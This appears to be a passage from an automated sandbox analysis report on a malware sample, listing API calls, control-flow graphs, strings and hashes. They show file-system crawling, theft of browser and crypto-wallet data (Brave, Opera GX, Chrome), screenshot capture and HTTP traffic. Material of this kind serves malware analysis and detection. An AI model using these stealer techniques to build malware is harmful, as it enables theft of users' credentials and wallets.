                                                                                                                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004141C8
                                                                                                                                                                                                                                                              • strtok_s.MSVCRT ref: 004141EE
                                                                                                                                                                                                                                                              • FindNextFileA.KERNELBASE(000000FF,?), ref: 0041430B
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(000000FF), ref: 0041431C
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: wsprintf$memset$Find$FileH_prologlstrcatstrtok_s$CloseFirstMatchNextPathSpecSystemTimeUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\%s\%s$%s\%s\%s$%s\*.*
                                                                                                                                                                                                                                                              • API String ID: 3694881843-1801205404
                                                                                                                                                                                                                                                              • Opcode ID: 50efc432152d7d96c3fd2f47375d8bd4fd9a4dfe07715fc836f126937251d746
                                                                                                                                                                                                                                                              • Instruction ID: 55da94bd21c097ffa10f430634e9145b483ee7c040acaa7c4cc18feb4ec813ff
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 50efc432152d7d96c3fd2f47375d8bd4fd9a4dfe07715fc836f126937251d746
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F2A1917190011DABCF20EFA1DD49EDE7BBDEF48304F004066F919E2151EB399A998BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 1519 40bdaf-40be61 _EH_prolog call 40e2ea call 40e3ef call 40e463 call 40e3a8 call 40e355 * 2 call 40e2ea * 2 call 40e521 FindFirstFileA 1538 40be63-40bea3 call 40e355 * 3 call 4010d8 call 40e355 1519->1538 1539 40bea8-40beae 1519->1539 1569 40ca39-40ca5e call 40e355 * 2 1538->1569 1540 40beb0-40bec4 StrCmpCA 1539->1540 1542 40c9d9-40c9eb FindNextFileA 1540->1542 1543 40beca-40bede StrCmpCA 1540->1543 1542->1540 1547 40c9f1-40ca36 FindClose call 40e355 * 3 call 4010d8 call 40e355 1542->1547 1543->1542 1545 40bee4-40bf70 call 40e35e call 40e3ef call 40e463 * 2 call 40e3a8 call 40e355 * 3 1543->1545 1586 40c0d5-40c16a call 40e463 * 4 call 40e3a8 call 40e355 * 3 1545->1586 1587 40bf76-40bf8f call 40e521 StrCmpCA 1545->1587 1547->1569 1636 40c170-40c192 call 40e355 call 40e521 StrCmpCA 1586->1636 1592 40c035-40c0d0 call 40e463 * 4 call 40e3a8 call 40e355 * 3 1587->1592 1593 40bf95-40c030 call 40e463 * 4 call 40e3a8 call 40e355 * 3 1587->1593 1592->1636 1593->1636 1645 40c366-40c37b StrCmpCA 1636->1645 1646 40c198-40c1ac StrCmpCA 1636->1646 1648 40c3f0-40c405 StrCmpCA 1645->1648 1649 40c37d-40c3e0 call 401128 call 40e321 * 3 call 40b9ea 1645->1649 1646->1645 1647 40c1b2-40c2e0 call 40e2ea call 40f5de call 40e463 call 40e3ef call 40e3a8 call 40e355 * 3 call 40e521 * 2 call 40e2ea call 40e463 * 2 call 40e3a8 call 40e355 * 2 call 40e321 call 406138 1646->1647 1829 40c2e2-40c32a call 40e321 call 401128 call 412f70 call 40e355 1647->1829 1830 40c32f-40c361 call 40e521 call 40e4db call 40e521 call 40e355 * 2 1647->1830 1651 40c481-40c49c call 40e321 call 40f75f 1648->1651 1652 40c407-40c41e call 40e521 StrCmpCA 1648->1652 1704 40c3e5-40c3eb 1649->1704 1676 40c522-40c537 StrCmpCA 1651->1676 1677 40c4a2-40c4a5 1651->1677 1665 40c424-40c427 1652->1665 1666 40c948-40c94f 1652->1666 1665->1666 1672 40c42d-40c47f call 401128 call 40e321 * 2 1665->1672 1670 40c951-40c9be call 40e321 * 2 call 40e2ea call 401128 call 40bdaf 1666->1670 1671 40c9c9-40c9d4 call 40e4db * 2 1666->1671 1734 40c9c3 1670->1734 1671->1542 1717 40c500-40c512 call 40e321 call 4066f1 1672->1717 1683 40c778-40c78d StrCmpCA 1676->1683 1684 40c53d-40c5eb call 40e2ea call 40e463 call 40e3a8 call 40e355 call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 call 40e521 * 2 CopyFileA 1676->1684 1677->1666 1685 40c4ab-40c4fd call 401128 call 40e321 call 40e2ea 1677->1685 1683->1666 1690 40c793-40c841 call 40e2ea call 40e463 call 40e3a8 call 40e355 call 40f5de call 40e3ef call 40e3a8 call 40e355 * 2 call 40e521 * 2 CopyFileA 1683->1690 1780 40c5f1-40c6c9 call 401128 call 40e321 * 3 call 406dab call 401128 call 40e321 * 3 call 407814 1684->1780 1781 40c6cf-40c6e8 call 40e521 StrCmpCA 1684->1781 1685->1717 1785 40c925-40c937 call 40e521 DeleteFileA call 40e4db 1690->1785 1786 40c847-40c8ab call 401128 call 40e321 * 3 call 407147 1690->1786 1704->1666 1739 40c517-40c51d 1717->1739 1734->1671 1739->1666 1780->1781 1796 40c759-40c76b call 40e521 DeleteFileA call 40e4db 1781->1796 1797 40c6ea-40c753 call 401128 call 40e321 * 3 call 407e48 1781->1797 1811 40c93c 1785->1811 1839 40c8b0-40c91f call 401128 call 40e321 * 3 call 407463 1786->1839 1821 40c770-40c773 1796->1821 1797->1796 1816 40c93f-40c943 call 40e355 1811->1816 1816->1666 1821->1816 1829->1830 1830->1645 1839->1785
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040BDB4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: _EH_prolog.MSVCRT ref: 0040E3F4
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcpy.KERNEL32(00000000), ref: 0040E440
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3EF: lstrcat.KERNEL32(?,?), ref: 0040E44A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: _EH_prolog.MSVCRT ref: 0040E468
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrlen.KERNEL32(?,00000000,00000014,?,?,00415C39,?,?,00424A48,?,00000000,004244C3), ref: 0040E490
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcpy.KERNEL32(00000000), ref: 0040E4B7
                                                                                                                                                                                                                                                                • Part of subcall function 0040E463: lstrcat.KERNEL32(?,?), ref: 0040E4C2
                                                                                                                                                                                                                                                                • Part of subcall function 0040E3A8: lstrcpy.KERNEL32(00000000,?), ref: 0040E3E1
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(00000000,?,00423BAB,00423BAA,00000000,?,00423CEC,?,?,00423BA7,?,?,00000000), ref: 0040BE55
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423CF0,?,?,00000000), ref: 0040BEBC
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,00423CF4,?,?,00000000), ref: 0040BED6
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(00000000,Opera GX,00000000,?,?,?,00423CF8,?,?,00423BAE,?,?,00000000), ref: 0040BF87
                                                                                                                                                                                                                                                                • Part of subcall function 004010D8: _EH_prolog.MSVCRT ref: 004010DD
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: H_prologlstrcpy$lstrcat$FileFindFirstlstrlen
                                                                                                                                                                                                                                                              • String ID: B$Brave$Google Chrome$Opera GX$Preferences$\BraveWallet\Preferences
                                                                                                                                                                                                                                                              • API String ID: 3869166975-1712999469
                                                                                                                                                                                                                                                              • Opcode ID: 05e6dafba26929ee16c79725a5096563e05900a8343b09271e68ade2a7b8e087
                                                                                                                                                                                                                                                              • Instruction ID: 17cf665bec510dd10c8af1510a092d8f18dc0d4bbd26f40d745eae5778ab6a2c
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 05e6dafba26929ee16c79725a5096563e05900a8343b09271e68ade2a7b8e087
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 16828071900248EACF15EBB6C946BDD7FB8AF15308F1444AEE845732C2DB781B58CB66
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                                                              control_flow_graph 2592 414cc7-414d0d _EH_prolog wsprintfA FindFirstFileA 2593 414d13-414d27 StrCmpCA 2592->2593 2594 414f0b-414f23 call 4010d8 2592->2594 2595 414d2d-414d41 StrCmpCA 2593->2595 2596 414eee-414efe FindNextFileA 2593->2596 2595->2596 2599 414d47-414d83 wsprintfA StrCmpCA 2595->2599 2596->2593 2598 414f04-414f05 FindClose 2596->2598 2598->2594 2601 414d85-414d94 wsprintfA 2599->2601 2602 414d96-414da5 wsprintfA 2599->2602 2603 414da8-414dba PathMatchSpecA 2601->2603 2602->2603 2604 414ec1-414eeb call 401128 call 414cc7 2603->2604 2605 414dc0-414e68 call 40f516 lstrcat * 5 call 40e2ea call 406138 2603->2605 2604->2596 2617 414eb4-414eba 2605->2617 2618 414e6a-414eaf call 40e2ea call 401128 call 412f70 call 40e355 2605->2618 2617->2604 2618->2617
                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$wsprintf$Find$File$CloseFirstH_prologMatchNextPathSpec
                                                                                                                                                                                                                                                              • String ID: %s\%s$%s\%s$%s\*
                                                                                                                                                                                                                                                              • API String ID: 1348259030-445461498
                                                                                                                                                                                                                                                              • Opcode ID: 7d1bba5a567e4f85a4f71222bda9ed4701143631782d026f7ea14414dbee75f1
                                                                                                                                                                                                                                                              • Instruction ID: 3b0fe21ec450e1e38f4dcee90ce410e2317bd6c9bf3c8481a708f75c4baa7dd8
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7d1bba5a567e4f85a4f71222bda9ed4701143631782d026f7ea14414dbee75f1
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 96512871900218ABCF20EBA1EC49ADE7BBDFF08315F0084AAF515E2191EB3997558F95
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040FD84
                                                                                                                                                                                                                                                              • memset.MSVCRT ref: 0040FDAA
                                                                                                                                                                                                                                                              • GetDesktopWindow.USER32 ref: 0040FDE0
                                                                                                                                                                                                                                                              • GetWindowRect.USER32(00000000,?), ref: 0040FDED
                                                                                                                                                                                                                                                              • GetDC.USER32(00000000), ref: 0040FDF4
                                                                                                                                                                                                                                                              • CreateCompatibleDC.GDI32(00000000), ref: 0040FDFE
                                                                                                                                                                                                                                                              • CreateCompatibleBitmap.GDI32(?,?,?), ref: 0040FE0F
                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,00000000), ref: 0040FE1A
                                                                                                                                                                                                                                                              • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0040FE36
                                                                                                                                                                                                                                                              • GlobalFix.KERNEL32(?), ref: 0040FE94
                                                                                                                                                                                                                                                              • GlobalSize.KERNEL32(?), ref: 0040FEA0
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00404360: _EH_prolog.MSVCRT ref: 00404365
                                                                                                                                                                                                                                                                • Part of subcall function 00404360: lstrlen.KERNEL32(00000000), ref: 004043D4
                                                                                                                                                                                                                                                                • Part of subcall function 00404360: StrCmpCA.SHLWAPI(?,004239B7,004239B3,004239AB,004239A7,004239A6), ref: 00404457
                                                                                                                                                                                                                                                                • Part of subcall function 00404360: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00404477
                                                                                                                                                                                                                                                              • SelectObject.GDI32(00000000,?), ref: 0040FF1A
                                                                                                                                                                                                                                                              • DeleteObject.GDI32(?), ref: 0040FF35
                                                                                                                                                                                                                                                              • DeleteObject.GDI32(00000000), ref: 0040FF3C
                                                                                                                                                                                                                                                              • ReleaseDC.USER32(00000000,?), ref: 0040FF46
                                                                                                                                                                                                                                                              • CloseWindow.USER32(00000000), ref: 0040FF4D
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Object$Window$CompatibleCreateDeleteGlobalH_prologSelectlstrcpy$BitmapCloseDesktopInternetOpenRectReleaseSizelstrlenmemset
                                                                                                                                                                                                                                                              • String ID: image/jpeg
                                                                                                                                                                                                                                                              • API String ID: 3067874393-3785015651
                                                                                                                                                                                                                                                              • Opcode ID: dcba5b109f9bd70c2729365cd2e83e713533885bd5fb782799216b498cb56c07
                                                                                                                                                                                                                                                              • Instruction ID: 879ab77ffff3ff30e6c7b4e68793e16e3bc93eab0a963a82db49d73bd1d71507
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: dcba5b109f9bd70c2729365cd2e83e713533885bd5fb782799216b498cb56c07
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 225127B2800109AFDF01EFE5ED499EEBFBAFF09354F10402AF901A2160D7355A159BA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 0040416A
                                                                                                                                                                                                                                                                • Part of subcall function 0040E321: lstrcpy.KERNEL32(00000000,FEF4858D), ref: 0040E347
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: _EH_prolog.MSVCRT ref: 00403A0C
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A3E
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A47
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: ??_U@YAPAXI@Z.MSVCRT ref: 00403A50
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: lstrlen.KERNEL32(00000000,00000000,?,?,00000000,00000001), ref: 00403A6A
                                                                                                                                                                                                                                                                • Part of subcall function 00403A07: InternetCrackUrlA.WININET(00000000,00000000,?,00000000), ref: 00403A7A
                                                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 004041B1
                                                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 004041B8
                                                                                                                                                                                                                                                              • InternetOpenA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004041D7
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?), ref: 004041EB
                                                                                                                                                                                                                                                              • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0040420F
                                                                                                                                                                                                                                                              • HttpOpenRequestA.WININET(?,GET,?,00000000,00000000,-00400100,00000000), ref: 00404245
                                                                                                                                                                                                                                                              • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00404269
                                                                                                                                                                                                                                                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00404274
                                                                                                                                                                                                                                                              • HttpQueryInfoA.WININET(00000000,00000013,?,?,00000000), ref: 00404292
                                                                                                                                                                                                                                                              • InternetReadFile.WININET(00000000,?,00000400,?), ref: 004042EA
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(00000000), ref: 0040431C
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 00404325
                                                                                                                                                                                                                                                              • InternetCloseHandle.WININET(?), ref: 0040432E
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: Internet$CloseHandleHttp$H_prologHeapOpenRequest$AllocateConnectCrackFileInfoOptionProcessQueryReadSendlstrcpylstrlen
                                                                                                                                                                                                                                                              • String ID: GET
                                                                                                                                                                                                                                                              • API String ID: 1687531150-1805413626
                                                                                                                                                                                                                                                              • Opcode ID: d3b4e2465853432a3083c444009e64989dd2031eb63236b22f5920166c39059c
                                                                                                                                                                                                                                                              • Instruction ID: d7e372f959dd3e5caf44f256035fa2464378805655ddc5b1d5d1d0239f48c882
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d3b4e2465853432a3083c444009e64989dd2031eb63236b22f5920166c39059c
                                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 69517BB2900119AFDF10EFE4DD85AEFBBB9EB48704F00412AFA11B2190D7785E45CBA5
                                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                              • _EH_prolog.MSVCRT ref: 004145C1
                                                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 004145E4
                                                                                                                                                                                                                                                              • FindFirstFileA.KERNEL32(?,?), ref: 004145FB
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004247E8), ref: 0041461D
                                                                                                                                                                                                                                                              • StrCmpCA.SHLWAPI(?,004247EC), ref: 00414637
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 0041466C
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?), ref: 0041467F
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 00414693
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004146A3
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,004247F0), ref: 004146B5
                                                                                                                                                                                                                                                              • lstrcat.KERNEL32(?,?), ref: 004146C9
                                                                                                                                                                                                                                                                • Part of subcall function 0040E2EA: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E314
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: _EH_prolog.MSVCRT ref: 0040613D
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406160
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 00406177
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 00406193
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 004061AD
                                                                                                                                                                                                                                                                • Part of subcall function 00406138: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 004061CE
                                                                                                                                                                                                                                                                • Part of subcall function 00401128: _EH_prolog.MSVCRT ref: 0040112D
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: _EH_prolog.MSVCRT ref: 00412F75
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: CreateThread.KERNEL32(00000000,00000000,00411D72,?,00000000,00000000), ref: 0041301B
                                                                                                                                                                                                                                                                • Part of subcall function 00412F70: WaitForSingleObject.KERNEL32(00000000,000003E8,?,00000000), ref: 00413023
                                                                                                                                                                                                                                                              • FindNextFileA.KERNEL32(00000000,?), ref: 00414763
                                                                                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00414772
                                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                                              • Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              • Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                                              • API ID: lstrcat$File$H_prolog$Find$CloseCreate$AllocFirstHandleLocalNextObjectReadSingleSizeThreadWaitlstrcpywsprintf
                                                                                                                                                                                                                                                              • String ID: %s\%s
                                                                                                                                                                                                                                                              • API String ID: 2282932919-4073750446
                                                                                                                                                                                                                                                              • Opcode ID: 01be6c28ac1b19b7c073bb7578a16f2c66a2c01bc7fe04de0b7306356903f4a3
                                                                                                                                                                                                                                                              • Instruction ID: a228b40f5a8258b76ced91f53415c5fba0f54d3f940ba50f2d363ddb221343bf
                                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 01be6c28ac1b19b7c073bb7578a16f2c66a2c01bc7fe04de0b7306356903f4a3
